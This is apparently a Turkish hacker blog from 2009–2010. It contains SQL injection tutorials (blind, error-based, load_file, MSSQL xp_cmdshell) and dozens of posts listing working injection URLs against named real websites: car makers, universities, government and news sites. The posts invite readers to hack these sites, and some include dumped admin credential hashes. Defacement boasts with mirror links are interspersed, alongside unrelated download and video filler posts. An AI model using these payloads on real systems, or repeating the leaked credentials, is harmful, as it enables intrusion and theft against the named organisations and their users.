TheNeSa

mysql de blind sql injection

2010-06-30T08:47:00.001-07:00

sa

mysql de blind sql injection anlatcam

önce sql injection tespit edelim

and 1=2 yaptığınızda sayfa değişiyo and 1=1 yaptığınızda düzeliyosa injection vardır

yalnız burada direk and 1=2 yaptığında bozulmuyosa pes etememek lazım

and 1=1-- şeklinde v.s denenir o şekilde de bulabilrisiniz.

şimdi hemen version bakalım 4 se saten tahmin etmek zorundasınız

5 se information_schema daki tables columnundan çekebiliriz

and substring(@@version,1,1)=5 dedik ve sayfa doğru açıldıysa version 5 demektir peki bu nasıl oluyo

bundan önce substringi anlatmıştım burda dedikki

versionun 1 de 1 e kadar yani 1. karekter 5tir dedik eğer doğruysa saten sayfa düzgün açılır

yanlışsa bozulma olur sayfada. mantık bu herşeyde bunu yapıyoz saten

bu kısmı anlamayan diğer bölümlere geçmesin lütfen bana ulaşsın anlatim :D

şimdi version 5 dedik table çekelim

burda isterseniz like kullanın isterseniz tek tek deneyin :D

tek tek denemek programların işi like kullanırsanız kolaylık olur

login sayfasının kaynak kodlarından tablo adını bulabilrisiniz abi kesin o olcak diye bişe yok

mesela user filan likede kullanın

örnek bi tane yazalım

and substring((select table_name from information_schema.tables where table_name like 0x257573657225),1,1)=0x75

burda dedikki içersinde user geçen ilk tablonun ilk harfi 0x75 yani u mu eğer u ise demekki sayfa düzgün açılcak

işte böle :D biraz uğraştırıyo yani :D

istersenizdeneme işini like ilede yapabilrisiniz bu size kalmış.

evet işte bu şekilde table çekiyoz tablomiz users olsun.

columnda aynı bu şeil bulunuyo

and substring((select column_name from information_schema.columns where table_name=0x7573657273 limit 2,1),1,50) like 0x257061737325

burda 0x7573657273 bu users demek like 0x257061737325 buda %pass demek yani yine deniyoruz burda limit 2 dedim genel de id yser pass geliyo yani 0,1,2

işte böle deneye deney buluyonuz

columnlarıda bulduk diyelim

user pass olsun şimdi passı çekelim

and substring((select user from users),1,1)=0xbilmemne

burda tek tek harf sayı filan deneye deneye gidersniz md5 halide olabilir işte deneye deneye çıkarcaksınız :D

allah sabır versin , kolay gelsin

by TheNeSa

mysql Substring kullanımı

2010-06-27T05:56:00.000-07:00

sa

arkadaşlar şu tablo listelemede like kullanmaktanda aciz olanlar tabloları başka ne şekilde sıralayabiliriz dediler bende düşündüm

bunun için substring kullanabiliriz dedim onun için subsring anlatcam

mysql de substring kullanımına bi örnek göstermeden önce açıklamasını yapalım

substring ile sunucudan kaç karekter alcağımızı ve karekter aralığını beliryebiiriz. bunu çok çeşitli yerlerde kullanabiliriz. blind de kullanılıyo sıklıkla.

biz tabloların hepsini listelemede kullanak :D

örneğin

tablolaları çekiyoruz

tamamı sığmıyo

like ilede uğraşmak istemiyoruz bu tam bize göre :D

örneğin tabloların 1 ile 100. karektere kadarını görelim

union select 1,2,3,substring(group_concat(table_name),1,100),4,5--

şimdi 100 ile 200 ü görelim

union select 1,2,3,substring(group_concat(table_name),100,200),4,5--

bu şekilde columna sığmıyosa kolayca halledebiirsiniz.

bi dahaki sefere blind anlatcam blind de hala takılanlar var biliyorum yakında bekleyin...

bu arada mysql injection u genel anlamda anlatan bi video çektim onuda bi ara yayınlıcam.

kolay gelsin.

by TheNeSa

GTA San Andreas %100 Save

2010-04-13T02:53:00.000-07:00

Büyük zevkle oynadığımız ve görevlerini bitirmek için saatlerimizi verdiğimiz Gta Sanandreas'i hiç zorlanmadan görevleri bitmiş halde oynamaya ne dersiniz?

Bu yama ile Gta Sanandreas görevleri %100 bitmiş duruma gelmektedir, yani bir anlamda San andreasın bitirilmiş save dosyasıdır...

GTA San Andreas %100 Save | İndirmek için Tıklayın

LimeWire 5.5.8 indir download

2010-04-13T02:45:00.001-07:00

Güvenli dosya paylaşımı, hızlı dosya indirme hızı ve gelişmiş arama seçenekleri ile en çok tercih edilen paylaşım programlarının başında gelen LimeWire müzik, resim, video, program ve doküman gibi istediğiniz her türlü dosyayı indirebileceğiniz ve paylaşabileceğiniz bir program.

LimeWire 5.5.8 indir download | Programı indirmek İçin Tıklayın

YGS LYS SBS Puan Hesaplama Motoru - Puanmatik

2010-04-13T02:32:00.000-07:00

YGS Puan Hesaplama

LYS Puan Hesaplama

8. Sınıf SBS Puan Hesaplama

7. Sınıf SBS Puan Hesaplama

6. Sınıf SBS Puan Hesaplama

hepsi bir arada :D

Puanınızı Hesaplamak için Tıklayın

Karakalem resim yapmak isteyenler hangi çizimlerle başlamalı?

2010-04-06T01:41:00.000-07:00

Karakalem resim yapmak isteyenler hangi çizimlerle başlamalı?

izlemek için Tıkla

Kolbastıda ne tür ayak ve bacak hareketleri var?

2010-04-06T01:40:00.000-07:00

Kolbastıda ne tür ayak ve bacak hareketleri var?

izlemek için Tıkla

Hamileliğin 1. ayında anne karnındaki bebek ne durumdadır?

2010-04-06T01:34:00.001-07:00

Hamileliğin 1. ayında anne karnındaki bebek ne durumdadır?

izlemek için Tıkla

Hamileliğin son ayında anne karnındaki bebek ne durumdadır?

2010-04-06T01:33:00.001-07:00

Hamileliğin son ayında anne karnındaki bebek ne durumdadır?

izlemek için Tıkla

Hamileliğin 2. ayında anne karnındaki bebek ne durumdadır?

2010-04-06T01:31:00.000-07:00

Hamileliğin 2. ayında anne karnındaki bebek ne durumdadır?

izlemek için Tıkla

Hamileliğin 7. ayında anne karnındaki bebek ne durumdadır?

2010-04-06T01:30:00.000-07:00

Hamileliğin 7. ayında anne karnındaki bebek ne durumdadır?

izlemek için Tıkla

Hamileliğin 3. ayında anne karnındaki bebek ne durumdadır?

2010-04-06T01:29:00.000-07:00

Hamileliğin 3. ayında anne karnındaki bebek ne durumdadır?

izlemek için Tıkla

Hamileliğin 5. ayında anne karnındaki bebek ne durumdadır?

2010-04-06T01:28:00.000-07:00

Hamileliğin 5. ayında anne karnındaki bebek ne durumdadır?

izlemek için Tıkla

Hamileliğin 6. ayında anne karnındaki bebek ne durumdadır?

2010-04-06T01:27:00.000-07:00

Hamileliğin 6. ayında anne karnındaki bebek ne durumdadır?

izlemek için Tıkla

Hamileliğin 4. ayında anne karnındaki bebek ne durumdadır?

2010-04-06T01:25:00.000-07:00

Hamileliğin 4. ayında anne karnındaki bebek ne durumdadır?

izlemek için Tıkla

Hamileliğin 9. ayında anne karnındaki bebek ne durumdadır?

2010-04-06T01:23:00.000-07:00

Hamileliğin 9. ayında anne karnındaki bebek ne durumdadır?

izlemek için Tıkla

Hamileliğin 8. ayında anne karnındaki bebek ne durumdadır?

2010-04-06T01:18:00.000-07:00

Hamileliğin 8. ayında anne karnındaki bebek ne durumdadır?

izlemek için Tıkla

Boğa burcu erkeğinin özellikleri nelerdir?

2010-03-29T03:53:00.000-07:00

Boğa burcu erkeğinin özellikleri nelerdir? izlemek için Tıkla

Bir kere aldatan hep mi aldatır?

2010-03-29T03:30:00.000-07:00

Bir kere aldatan hep mi aldatır? izlemek için Tıkla

S.a

2010-03-29T03:19:00.000-07:00

bundan sora blogda hack dışında şeylerde yayınlıcam biraz daha değiştircem normal bi blog yapcam bakalım artık hack hack olmuyo hep :D

Avustralya Savunma Bakanlığı Hacked

2010-02-05T03:51:00.000-08:00

mirror:

http://zone-h.org/mirror/id/10201864

by TheNeSa

sql injection

2010-01-27T05:48:00.001-08:00

S.a arkadaşlar

her gün sql injection öğrenmek istiyom bana sql öğret v.s taleplerle yanıma adam geliyo. daha önce bazı dökümanlar yayınladım ama bi tane samimi bi ağızdan sql mantığını kavramanız açısında döküman yazim dedim.

şimdi sql nedir önce onu öğrenelim.

sql veritabını yönetme dilidir. yani veritabına bişe eklersek sql dilini kullanmamız lazım tmm ?

peki sql injection nedir?

şimdi normalde sql veritabanını biz sql iş yaptırmak için kullanıyoruz ya adamlar kod hatası yapıyo site üzerinde sql kodları çalıştırcak yerler buluyoruz ve çalıştırıyoruz kodlarımızı blgi alıyos veya ekliyos sorada siteyi hackledik filan diyos. sanırım buda oldu :D ?

peki adamlar nasıl kod hatası yapıyolar ?

bakın az programla biliyosanır her dilin bi meta-karekteri vardır. sql dilindede " ' " meta karelter bu bunu engelleyemeyince hata veridirliyor.

diğer şekilde union varya sql de birden fazla işlem yapmak için adam 34 id'li haberi çağırıyo sen araya union koyuyon sora select le şifreleri çağırıyon alıyon. olay bu. burda yapılan hatada deişkenin tam belirlenmemesi yani webmaster üşengeçliği :D.

işte böle buraya kadar tmm dımı :D

biz ne yapıyos ?

bizde veritabanlarının dillerini iyici öğreniyos sorada uygun yeri buldukmu koyuyos siteye :D

veri tabanlarını kullanma komutları her yerde var. biz bunları alıyos işte inceliyos sorada siz mysql injection anlatımı diye sunuyos :D

tabi bu bu kadar basit deyil 100 türlü engel aşma yöntemi var bunlarda hep ayrıntılara dikkat etmekle oluyo

sql injectionda pratik olmak için pc nize sql kurun sora komutlarla çalışın biras süper oluyo :D.

nese kolay gelsin bi dahaki sql dökümanında görüşelim :D

not : bu arada bu dökümanı anlamassanız söyleyin örneklerle anlatım yaptığım bi döküman var onu yayınlarım.

by TheNeSa

Huggies :D :D

2010-01-27T05:46:00.000-08:00

site:

http://www.huggiesclub.cz

mirror:

http://zone-h.org/mirror/id/10170657

by TheNeSa

exper exper mucked :D

2010-01-27T05:44:00.000-08:00

site:

exper.net.tr

mirror:

http://zone-h.org/mirror/id/10170466

by TheNeSa

mysql like kullanımı

2010-01-27T04:41:00.000-08:00

s.a arkadaşlar

sql de kolaylık olması için like komutu kullanımından bahsedecem.

mysql de tabloları sıralarken bazen çok uzun oluyo ve group_concat

bile kulalnsak admin tablosunu bulamıyoruz. Onun için ben like komutunu kullanıyorum.

like ne demektir ? benzer içeren

mesela

thenesa.com/nesa.php?id=1 union select 1,table_name,2 from information_Schema.table where table_name like 'a%'

yaptığımızda a harfiyle başlayan tablolar gelcektir.

bunu siz geliştirebilir ihtiyacınız doğrultusunda kullanabilirsiniz.

magic filan varsa hexlersiniz filan işte biliyosunuz o kadar :D

kolay gelsin.

by TheNeSa

Loginsystems Hacked

2010-01-16T07:17:00.000-08:00

site:

http://www.loginsistemi.com.mk

mirror:

http://zone-h.org/mirror/id/10122946

by TheNeSa

Acer acer :D :D

2010-01-16T07:14:00.000-08:00

sites:

edu.acer.com.sg
promo.acer.com.sg
support.acer.com.sg
gift.acer.com.tw

mirror:

http://zone-h.org/mirror/id/10119249
http://zone-h.org/mirror/id/10119232
http://zone-h.org/mirror/id/10119231
http://turk-h.org/defacement/view/355164/gift.acer.com.tw/ag/

by TheNeSa

Renault.com.tw Hacked

2010-01-16T07:12:00.000-08:00

site:

http://www.renault.com.tw/

mirror:

http://mirror-h.com/deface_mirror/?id=84033

by TheNeSa

fiat.com.mk Hacked

2010-01-16T07:04:00.001-08:00

site:

www.fiat.com.mk

mirror:

http://mirror-h.com/deface_mirror/?id=82809

by TheNeSa

Army.md Hacked !

2010-01-14T23:53:00.000-08:00

site:

http://www.army.md

mirror:

http://www.zone-h.org/mirror/id/10098054

by TheNeSa

Microsoft.com.mk Hakced !

2010-01-14T23:49:00.000-08:00

site:

http://www.microsoft.com.mk

Mirror:

http://turk-h.org/defacement/view/354447/microsoft.com.mk/piracy/

by TheNeSa

www.peugeot.gr sql

2009-12-12T07:22:00.001-08:00

site:
http://www.peugeot.gr

sql:

http://www.peugeot.gr/news/inside.php?id=208%20and%201=1%20union%20select%201,concat%28username,0x3a,password%29,3,4%20from%20users--

admin:452eab887f2c51c8

peugeot:00bc2ac66a0bd87d

by TheNeSa

http://imid.tarim.gov.tr/ sql

2009-12-01T04:36:00.000-08:00

site:

http://imid.tarim.gov.tr/

sql:

http://imid.tarim.gov.tr/index.php?p=duyuruDetay&id=43%27%20and%201=2%20union%20select%201,unhex%28hex%28group_concat%28table_name%29%29%29,unhex%28hex%28group_concat%28table_name%29%29%29,unhex%28hex%28group_concat%28table_name%29%29%29%20from%20information_Schema.tables/*

bulduklarımı ara sıra yayınlamaya çalışıyom

kolay gele

by TheNeSa

aix.ee.eng.deu.edu.tr sql

2009-11-13T08:14:00.000-08:00

site:

http://aix.ee.eng.deu.edu.tr

sql:

http://aix.ee.eng.deu.edu.tr/print.php?sid=49
%20and%201=2%20union%20select
%20unhex%28hex%28@@version%29%29,2,3,4,5,6

version 4

kolay gele

by TheNeSa

columbia.edu iki sub hacked

2009-10-29T09:31:00.000-07:00

site:

asp.cumc.columbia.edu
chaos.cpmc.columbia.edu

mirror:

http://zone-h.org/mirror/id/9825285
http://zone-h.org/mirror/id/9825284

by TheNeSa

local.fiat.nl hacked

2009-10-29T09:30:00.000-07:00

site:

local.fiat.nl

mirror:

http://zone-h.org/mirror/id/9824935

by TheNeSa

unesco.cl sql :D

2009-10-28T05:50:00.000-07:00

site:

http://unesco.cl/

sql:

http://unesco.cl/seccion-central.php?cat=4
%20and%201=2%20union%20select%201,2,co
ncat_ws(0x3a,id,usuario,clave)+from%20editor--

zone-h de rx5 tarafınd hacklenmiş grdüm baktım

merak edenler meralarını giderebilirler :D

bi kopyasıda burda

http://www.workman.cl/unesco/

kolay gelsin

by TheNeSa

www.bso.bilkent.edu.tr sql

2009-10-28T05:21:00.001-07:00

site:

www.bso.bilkent.edu.tr

sql:

http://www.bso.bilkent.edu.tr/english/
include/archive.php?id=8%20and%201=2%2
0union%20select%20@@version--

version 4

kolay gele

by TheNeSa

kutuphanekatalog.akparti.org.tr hacked

2009-10-28T05:17:00.000-07:00

sa

bunu protesto amaçlı yaptım

açılım taraftarı değilim

bu hükümetin yaptıklarıda hiç hoşuma gitmiyo

işte site

http://kutuphanekatalog.akparti.org.tr/

işte mirror

http://zone-h.org/mirror/id/9818532

kolay gelsin

by TheNeSa

cayfer.bilkent.edu.tr sql

2009-10-28T05:14:00.000-07:00

sa uzun süresir yazmıyodum bi yazı yazim dedim :D

site:

http://cayfer.bilkent.edu.tr

sql

http://cayfer.bilkent.edu.tr/mrbs/web/view_entry.php
?id=-58568%20union%20select%20unhex(hex(@@version)
),2,3,4,5,6,7,8,9,10,11,12

version 4

kolay gele

by TheNeSa

shop.gigabyte.tw sql

2009-09-24T06:46:00.000-07:00

site:

http://shop.gigabyte.tw/

sql:

http://shop.gigabyte.tw/showroom/mallset_u.php?SOB=
-10878'%20union%20select%20group_concat(table_name)
,2+from%20information_schema.tables/*

uğraşmadım bakan hackler cc yok galiba :S

by TheNeSa

MySQL SQL Injection Cheat Sheet

2009-09-17T06:34:00.000-07:00

S.a arkadaşlar

pentestmonkey.net’de MySQL SQL Injection Cheat Sheet gördüm ve inceledim

gerçekten incelemeye değer her türlü komut mevcut mysql injectiona hakim olabilmek için

güzel bişe. Ben baktım inceledim sizde inceleyin. Umarım işinize yarar.

Bu arada 2 tanede bağlantı var biri md5 kırmak için diğeri .c exploit bağlantısı.

Not: eğer “bunu anlamıyoruz bunu Türkçeleştirin, açıklamalarını yapıda bize sunun”

diyosanız bir yorum bırakın eğer istek olursa onuda yaparıs.

Kolay gelsin.

İşte MySQL SQL Injection Cheat Sheet

Download

Kaynak: pentestmonkey.net

by TheNeSa

Youtube Sorununa bi Çözümde Benden

2009-09-17T06:22:00.001-07:00

Bildiğiniz gibi youtube ülkemizden kapalı bunu için çözümümüz dns ve proxy oluyor.

dns çoğu zman sorun oluşturabiliyo bende bu sebepten proxyi tercih ediyorum.

proxde bazen çalışıyo bazen çalışmıyo o sebeple geniş bi proxy listesini size sunuyorum.

bunun için size verceğim dosyayı belirtilen klasördekiyle değiştirmeniz yetiyor.

gayet hızlı gayet sağlam bi çözüm. sorun çıkarmayacağına garanti veriyorum :D

işte Download

nese kolay gelsin ha bide iyi seyirler :D

not: içinde oku diye metin belgesi var onu oku tmmdır :D

by TheNeSa

mysql Root

2009-09-11T06:17:00.000-07:00

s.a arkadaşlar mysql root anlatacağım

mysql root için load_file okumamız l

azım onun içinde mysql.user'in olması lazım.

mysql.user'in olsuğunu varsayalım.

column sayılarını eşitlenmiş farzediyosrus

:D buraları anlatmıştık :D

sitemiz thenesa.com/nesa.php?id=-9999 union select 1,2,3--

şimdi load_file içinde sitenin uzantısını bilmek gerekiyo

hatadan /home/thenesa/httpdocs/nesa.php uzantısı aldık.

şimdi bunu okuyalım.

thenesa.com/nesa.php?id=-9999 union select 1,load_file('/home/thenesa/httpdocs/nesa.php'),3--

magic var farzedelim

thenesa.com/nesa.php?id=-9999 union select 1,load_file(0xhexlenmiş hali:D),3--

yine olmadı şimdi

thenesa.com/nesa.php?id=-9999 union select 1,unhex(hex(load_file(0xhexlenmiş hali:D))),3--

yine olmassa charlayın

thenesa.com/nesa.php?id=-9999 union select 1,load_file(char bilmem ne :D),3--

oda olmadı

thenesa.com/nesa.php?id=-9999 union select 1,load_file(char bilmem ne :D),3--

unhex yaptıkya benzerini charla yapın yani

full char v.s v.s olur yani tabi mysql.user varsa.

şimid okuduk. baktık sitede config.php var :D

onu okuyak şimdi . /home/thenesa/httpdocs/config.php

onuda okuduk yukardaki gibi :D

baktık karşımıza

şöle bişe çıktı

// database server
$forum_server = “localhost”; //
// database user name
$forum_un = “root”;
// database password
$forum_pw = “root”;
// database name
$forum_database = “sqldb”;
?>

burdan db user name root pass root olduğunu öğreniyoruz.

öğrenelim :D

user root pass root :D

onlarıda aldık şimdi sitenin ip sini alıp

(ip almayı biliyosnuz dimi :D ping le :D)

MySQL Front v.b programlarla siteye bağlanıp root olcas

ama burdada bi güvenlik sorunu var

bağlana bilmem için sistemin 3306 portunun

açık olması lazım. eğer portumuzda açıksa

MySQL Front v.b programlarla bağlnıp

istediğimiz herşeyi yapabilirs.

kolay gelsin.

not: biras özet anlattım ayrıntılarda

load_file okumalarında sorun yaşarsanız onuda

ayrıntısıyla anlatırım istek olursa tabi.

işte mysql front Download

by TheNeSa

www.kurdistaname.com SQL pkk sitesi galiba

2009-09-06T06:57:00.000-07:00

site:

www.kurdistaname.com

SQL:

http://www.kurdistaname.com/qunciknivis.php?id=14%20and%201=2
%20union%20select%201,2,3,4,
unhex(hex(group_concat(kullanici,0x3a,sifre))),6,7,8%20from%20yazarlar

panel bulamadım :S

kolay gelsin

by TheNeSa

Www.nic.gp :D

2009-09-03T05:58:00.000-07:00

site:

http://www.nic.gp/

SQL:

http://www.nic.gp/news/newsReader.php?id=-1+
union+select+0,unhex(hex(concat_ws(0x3a,id,login,pass))),2,3%20from%20wusers

user pass

1:pr:1d7f2cc41d686ece

BgH7 kardeşimle yaptğımız küçük çalışma :D

kolay gelsin

by TheNeSa

Pangolin Editlendi :Di işte SQLNeSa - Link yenilendi !!

2009-08-31T05:48:00.000-07:00

arkadaşlar pangolini bilirsiniz. özellikle access de tablo denemek
adamı çok yorar bunu için perl python v.s tabanlarda yazılmış
exploitleri kullanırıs ben bunun için pangolini daha uygun buldum.
tr sitelere ve bi çok dildeki sitelere uygun tablo ve column'ları ekledim
ve biras editledim :D. tr'de geçilmicek access kalmas heralde :D
benim işime çok yaradı umarım işinizi görür :D

privde sayılabilir :D

bu arada kullanımda da bikaç farklı teknik var normal kullanımdan farklı onuda bi videoda gösteriris :D

biras kolpa oldu k.bakmayın

kolay gelsin..

Link yeni

Download link

by TheNeSa

not: hata verirse yeniden download edin bunu yeni yükleidim.

www.aeg.pt sql alın hackleyin :D

2009-08-08T06:29:00.001-07:00

site:

http://www.aeg.pt/

sql:

http://www.aeg.pt/news.php?news_id=-61%27%20union%20select%201,2,3,4,5,6,group_concat(table_name),8,group_concat(table_name),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.tables/*

by TheNeSa

bosch.hr subu sql alın hackleyin :D

2009-08-08T06:28:00.001-07:00

site:

http://www.blaupunkt.bosch.hr

sql:

http://www.blaupunkt.bosch.hr/tiskzpr_det.php?id=1%20and%201=2%20union%20select%201,2,3,concat%28user,0x3a,passwd%29,5,6,7+from+users

by TheNeSa

www.vestel.ru sql alın hackleyin :D

2009-08-08T06:26:00.002-07:00

site:

http://www.vestel.ru,

sql:

http://www.vestel.ru/ru/index.php?pid=cataloge&id=278%20and%201=2%20union%20select%20unhex%28hex%28group_concat%28table_name%29%29%29+from+information_schema.tables+where+table_schema=0x7534383130305f76657374656c

by TheNeSa

www.maraton.com.tr sql alın hackleyin :D

2009-08-08T06:26:00.001-07:00

site:

http://www.maraton.com.tr

sql:

http://www.maraton.com.tr/news.php?news_id=81990%20and%201=2%20union%20select%201,2,3,group_concat%28table_name%29,5,6,7,group_concat%28table_name%29,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables/*

by TheNeSa

http://dunyakupasi.zaman.com.tr/ SQL

2009-08-08T06:19:00.000-07:00

site:

http://dunyakupasi.zaman.com.tr/

sql:

http://dunyakupasi.zaman.com.tr/?bl=2&hn=173%20and%201=2%20union%20select%201,2,3,@@version,5,6,7,8,9,10,11

daha güsel sql'ler gelcek :D

by TheNeSa

http://sporvizyon.zaman.com.tr SQL

2009-08-08T06:16:00.000-07:00

site:

http://sporvizyon.zaman.com.tr

SQL:

http://sporvizyon.zaman.com.tr/?bl=10&hn=12301%20and%201=2%20union%20select%201,2,group_concat%28table_name%29,4,5,6,7,8,9,10,11,12,13+from++information_schema.tables

by TheNeSa

bi dun daha zaman subu http://turkuaz.zaman.com.tr/

2009-08-08T06:14:00.001-07:00

site:

http://turkuaz.zaman.com.tr/

sql:

http://turkuaz.zaman.com.tr/?bl=2&hn=5858%20and%201=2%20union%20select%201,2,group_concat%28table_name%29,4,5,6,7,8,9,10,11,12,13+from++information_schema.tables

dra kareşim bunu hacklemiş galiba :D

alın basın dicem lalmerlik yapmıyasız ha :D

by TheNeSa

facebook sql :D

2009-08-08T06:12:00.000-07:00

işte facebook

site:

http://apps.facebook.com/

SQl:

http://apps.facebook.com/checkking/init_corr.php?gtype=bfm/8&k=32&wu=999999000001%20and%201=2%20union%20select%20group_concat%28table_name%29%20from+information_Schema.tables

hackleyin kardeşlerim

by TheNeSa :D

zaman.com.tr bi sub daha :D http://arkadasim.zaman.com.tr/

2009-08-08T06:10:00.000-07:00

site:

http://arkadasim.zaman.com.tr/

sql:

http://arkadasim.zaman.com.tr/?bl=30&hn=12508%20and%201=2%20union%20select%201,2,group_concat%28table_name%29,4,5,6,7,8,9,10,11,12,13+from++information_schema.tables

hackleyin :D işterseniz ama zman yazık bence karışmayın :D

by TheNeSa

kitapzamani.zaman.com.tr Sql

2009-08-08T06:07:00.000-07:00

site:

http://kitapzamani.zaman.com.tr/

sql:

http://kitapzamani.zaman.com.tr/?bl=37&hn=1426%20and%201=2%20union%20select%201,2,group_concat%28table_name%29,4,5,6,7,8,9,10,11,12,13+from++information_schema.tables

işte tablolar biliyonus artık site hacklemiyom ara sıra kafa eserse yoksa alın siz hackleyin :D

by TheNeSa

işte nic'ler

2009-08-07T09:31:00.000-07:00

arkadaşlar bikaç nicde açık buldum demiştim bascas demiştim onları burda açıklıyorum

işte nic.co.ug

httpwww.nic.co.ugpg.phpp=media&s=news&Id=6%20and%201=2%20union%20select%201,1,unhex%28hex%28group_concat%28table_name%29%29%29,1,1+from+information_schema.tables

admin panelde ht koruma var geçilebilir :D

nic.pr

http://www.nic.pr/invoice.asp

işte burda email kısmında post var basit buda geçiliyo sanırırm böyleydi ') önrnek kod;-- şeklinde

nic.ec

burda post ve bypass deneye bilirsiniz bunu ben geçemdim :D

daha birçok nic var yavaş yavaş açıklarıs :D
bu 4. oluyo saten :D geçen bi tane mysql versi4 açıklamıştım basacaklar alsın bassın önlerine koyuyom

ben artık pek girmiyom saten giremiyom
öss var evde net kestiler öle yani giremiyom

bu gün girdim açıklayım dedim

dahada açıklıcam

mssql'de c:/ d:/ dosya okuma

2009-07-26T06:06:00.000-07:00

s.a

arkadaşlar mssql de c:/ d:/ e:/ v.s den dosyaları okumayı anlatacağım.

öncelikle okuyacağımız kısmı seçelim d:/ yi okuyacak olursak.

şöyle yapmamız lazım.

d:/ içindekileri bi tablo oluşturup içine koycas sora o

tabloyu okuyup bilgileri ulaşcas mantık bu.

şimdi oluşturalım

http://nesa.com/nesa.asp?id=1;drop table tablonesa

create table tablonesa(ID int identity,columnnesa

varchar(1000)) insert into tablonesa exec master..xp_cmdshell 'dir /b d:\';--

tablomuz: tablonesa

columnumuz: columnnesa

şimdi okuyalım.

http://nesa.com/nesa.asp?id=1 and 1=convert

(int,(select columnnesa from tablonesa where ID=1));--

where id=1,2,3.... v.s gider bölece okumuş oluruz :D

soru olursa burdayım

kolay gelsin

msn@thenesa.com thenesa.blogspot.com

by TheNeSa

error based mysql Anlatım

2009-07-22T05:50:00.000-07:00

her gün error based mysql hakkında sorular geliyo ve

bende bi döküman yazim dedim.

error based mysql de genelde site hata vermes siz sitedeki

değişikliklerden yola çıkarak column sayısını bulcaksınız.

nasılmı birasdan görces.

Öncelikle sitede açık olduğunu nasıl anlıcas.

sitemiz

thenesa.com/nesa.php?id=1

olsun.

site sonuna

thenesa.com/nesa.php?id=1'

(tırnak) koduğumuzda sitede değişiklik oluyosa yazılar felan

gidiyosa bişeler vardır :D

sora site sonuna and 1=1 ekliyoruz.

thenesa.com/nesa.php?id=1 and 1=1

ekledik şimdi sitenin sorunsuz açılmasını beklices.

sorunsuz açıldığını farz edelim.

şimdide sonuna and 1=2 ekleyelim.

(neden and 1=0 değil de and 1=2

bazı sitelerde and 1=0 sorun çıkarıyo

bunu kullanırsanız sizde görürsünüz ;) )

ekledik sitede yine bazı yaızlar gitti felan değişiklik

olduysa demekki sitede error based var.

hemen column sayısını öğrenelim

order by kullanıyoruz.

thenesa.com/nesa.php?id=1 and 1=1 order by 1,2,3,.... v.s

column öğreniyoruz aynı mysql gibi yalnız şimdi bide

extradan and 1=1 kullandık peki nezman durcas hatamı alcas hayır

bunda yine sitede değişiklik olup olmadığına bakıyoruz

yazılar felan gidiyomu değişiklik oluyomu biliyosunzu error based de hata yok.

nese column sayısınıda bulduk.

şimdi union çekelim :D

column sayımız 3 olsun.

thenesa.com/nesa.php?id=1 and 1=1 union select 1,2,3

yaptık ama column lar yansımadı

işte şimdi id yi değiştirmiyos burda

and 1=1'i and 1=2 yapıyoruz.

thenesa.com/nesa.php?id=1 and 1=2 union select 1,2,3

ve işte column'lar yansıdı. gersini zaten biliyorsunuz.

tablo column almayı mysql anlatımda anlatmıştım.

aynen onun gibi

ha bide sitelere göre sonuna "--" , "/*" ve column

aralarına boşluk , "/**/" , "+" vs. deneyerek bulun bunlar siteye göre değişiyor.

nese benden bu kadar bişe olursa saten soruyosunuz.

ben burdayım herkese yardımcı olmaya çalışıyorum.

msn@thenesa.com thenesa.blogspot.com

by TheNeSa

www.peugeot.com.sv Hacked !

2009-07-20T02:46:00.000-07:00

siteler:

http://www.peugeot.com.sv/

http://gevesa.demo.com.sv/

mirr0rlar:

http://turk-h.org/defacement/view/333359/peugeot.com.sv/

http://turk-h.org/defacement/view/333360/gevesa.demo.com.sv/

by TheNeSa

www.fiat500.com.tr Hacked !

2009-07-19T08:54:00.000-07:00

Site:

http://www.fiat500.com.tr/

mirr0r:

http://turkey-h.org/defacements/?id=74877

by TheNeSa

Türkiye Müteahhitler Birliği www.tmb.org.tr sql injection

2009-07-12T15:48:00.000-07:00

site:

http://www.tmb.org.tr

sql injection

http://www.tmb.org.tr/genel.php?ID=-10%27%20union
%20select%20group_concat
(column_name)+from+information_schema.columns+
where+table_name=0x7579655f69736c657269/*

işşte tablo adlarıı giren girsin.

kolay gele.

by TheNeSa

Audi Bulgaristan www.audi.bg sql injection

2009-07-11T13:46:00.000-07:00

site:

http://audi.bg/

sql injection:

http://audi.bg/news.php?newsid=689+and+1=2+
union+select+0,1,2,@@version,4,5,6,7,8,9,10,11,12,13

buda version 4 tahmin edin :D

kolay gele.

by TheNeSa

Audi Avusturya www.audi.at ve subları bg.audi.at ve cms.bg.audi.at Sql injection

2009-07-11T13:38:00.000-07:00

site:

http://audi.at

http://bg.audi.at

http://cms.bg.audi.at

Sql injection:

http://audi.at/news.php?newsid=689+and+1=2+
union+select+0,1,2,@@version,4,5,6,7,8,9,10,11,12,13

http://bg.audi.at/news.php?newsid=689+and+1=2+
union+select+0,1,2,@@version,4,5,6,7,8,9,10,11,12,13

http://cms.bg.audi.at/news.php?newsid=689+and+1=2+
union+select+0,1,2,@@version,4,5,6,7,8,9,10,11,12,13

version 4 ler tahmin etmek lazım..

kolay gelsin.

by TheNeSa

Audi Romanya www.audi.ro sql injection

2009-07-11T13:30:00.000-07:00

site:

http://www.audi.ro/

sql injection:

http://www.audi.ro/news.php?newsid=254%20%20and%201=2+union+select+0,1,2,@@version,4,5,6,7,8,9,10,11,12,13

version 4 tahmin etmek lazım..

kolay gelsin.

by TheNeSa

mebsertifika.sakarya.edu.tr Hacked !

2009-07-11T09:48:00.000-07:00

site:

http://www.mebsertifika.sakarya.edu.tr/

mirr0r:

http://turk-h.org/defacement/view/332122/mebsertifika.sakarya.edu...

by TheNeSa

Erciyes Üniversitesi Hacked !

2009-07-11T09:23:00.001-07:00

Site:

http://fef.erciyes.edu.tr/

mirr0r:

http://zone-h.org/mirror/id/9096180

by TheNeSa

Türkiye Yelken Federasyonu Sql injection

2009-07-10T16:23:00.000-07:00

Site:

http://www.tyf.org.tr/

Sql:

http://www.tyf.org.tr/news.php?id=-397%20union%20select%20@@version

version 4 tablo tahmin etmek lazım büyük ihtimalle basit bişedir.

buda panel :

http://www.tyf.org.tr/admin/login.php

kolay gelsin

by TheNeSa

www.kanal7.com.tr sql injection

2009-07-10T10:45:00.001-07:00

Site:

http://www.kanal7.com.tr/

Sql:

http://www.kanal7.com.tr/duyuruDetay.php?id=9%20and%201=2%20
union%20select%201,group_concat(table_name),unhex(hex(group_concat(table_name))),4,
group_concat(table_name),6+from+information_schema.tables--

işte tablo adları admin tablosu yok saten panelde yok belki
işinize yarayabilir ne sql die sormayın blind mysql.

by TheNeSa

